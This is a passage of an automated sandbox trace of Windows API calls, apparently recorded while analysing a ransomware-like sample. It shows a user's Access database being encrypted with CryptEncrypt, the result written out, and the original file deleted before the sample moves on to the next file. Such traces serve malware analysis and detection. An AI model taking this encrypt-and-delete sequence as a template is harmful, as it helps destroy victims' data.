Flags=0x0, Size=0x4) returned 0x43e27e0 [0076.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0076.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x55011) returned 0x450a3d0 [0076.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0076.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0076.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0076.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0076.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0076.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0076.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0076.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0076.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0076.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0076.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0076.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0076.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0076.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0076.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0076.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0076.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x55000) returned 0x48f0048 [0076.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0076.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x55000) returned 0x4945050 [0076.424] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.431] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0076.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0076.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0076.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0076.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cad48 [0076.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cad48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0076.431] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x450a3d0*, pdwDataLen=0x144e790*=0x55000, dwBufLen=0x55010 | out: pbData=0x450a3d0*, pdwDataLen=0x144e790*=0x55010) returned 1 [0076.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0076.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0076.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0076.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0076.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0076.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0076.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0076.442] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.442] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.442] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.469] WriteFile (in: hFile=0x258, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0x55010, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144f194*=0x55010, lpOverlapped=0x0) returned 1 [0076.482] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0076.482] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.482] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0076.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0076.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0076.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0076.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0076.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca730, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0076.482] CryptDestroyKey (hKey=0x41ac180) returned 1 [0076.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0076.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0076.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0076.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.483] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.483] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.483] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.483] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.483] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.483] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.483] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.483] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.483] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0076.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0076.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0076.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0076.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0076.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0076.483] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0076.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0076.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca508 [0076.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0076.484] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.484] FreeLibrary (hLibModule=0x756e0000) returned 1 [0076.484] CloseHandle (hObject=0x298) returned 1 [0076.484] CloseHandle (hObject=0x258) returned 1 [0076.498] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Database1.accdb", lpFilePart=0x0) returned 0x29 [0076.498] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb")) returned 0x20 [0076.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0076.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0076.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0076.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0076.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0076.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0076.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0076.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0076.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0076.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0076.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0076.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359cd8 [0076.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0076.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0076.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0076.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0076.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359cd8 | out: hHeap=0x1780000) returned 1 [0076.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0076.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0076.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0076.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0076.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0076.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0076.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0076.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0076.500] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 0x41ac440 [0076.500] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb")) returned 1 [0076.505] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 0 [0076.506] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0076.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0076.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0076.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0076.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0076.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0076.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0076.507] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0076.507] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9d90 | out: hHeap=0x1780000) returned 1 [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0076.507] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0076.507] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0076.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0076.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0076.507] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0076.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0076.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0076.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21d0 [0076.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0076.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0076.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0076.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0076.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0076.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0076.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0076.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0076.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0076.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0076.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0076.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0076.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0076.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7cf8 [0076.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0076.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0076.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0076.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9938 [0076.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0076.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0076.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0076.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0076.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0076.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0076.509] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0076.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0076.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0076.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0076.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0076.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0076.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0076.509] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0076.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0076.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0076.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0076.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0076.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0076.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0076.509] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac6c0 [0076.509] FindClose (in: hFindFile=0x41ac6c0 | out: hFindFile=0x41ac6c0) returned 1 [0076.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0076.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0076.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0076.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0076.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0076.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0076.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.510] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0076.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0076.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0076.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0076.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0076.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0076.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0076.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0076.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0076.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c50 [0076.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0076.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 